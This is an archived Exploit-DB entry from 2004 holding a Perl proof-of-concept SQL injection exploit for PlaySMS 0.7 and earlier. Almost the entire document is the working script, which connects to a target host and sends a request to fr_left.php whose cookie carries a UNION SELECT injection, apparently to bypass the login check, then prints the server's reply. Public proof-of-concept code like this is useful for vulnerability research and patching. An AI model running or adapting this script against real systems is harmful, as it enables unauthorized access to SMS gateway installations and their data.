PlaySms 0.7 - SQL Injection

EDB-ID:

404




Platform:

Linux

Date:

2004-08-19


#!/usr/bin/perl 
# PlaySMS version 0.7 and prior SQL Injection PoC 
# Written by Noam Rathaus of Beyond Security Ltd. 
# 

use IO::Socket; 
use strict; 

my $host = $ARGV[0]; 

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" ); 

unless ($remote) { die "cannot connect to http daemon on $host" } 

print "connected "; 

$remote->autoflush(1); 

my $http = "GET /~playsms/fr_left.php HTTP/1.1 
Host: $host:80 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 
Firefox/0.9.1 
Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 
Accept-Language: en-us,en;q=0.5 
Accept-Encoding: gzip,deflate 
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 
Keep-Alive: 300 
Cookie: vc1=ticket; vc2='%20union%20select%20'ticket; 
Content-Type: application/x-www-form-urlencoded 
Connection: close 

"; 

print "HTTP: [$http] "; 
print $remote $http; 
sleep(1); 
print "Sent "; 

while (<$remote>) 
{ 
print $_; 
} 
print " "; 

close $remote; 

# milw0rm.com [2004-08-19]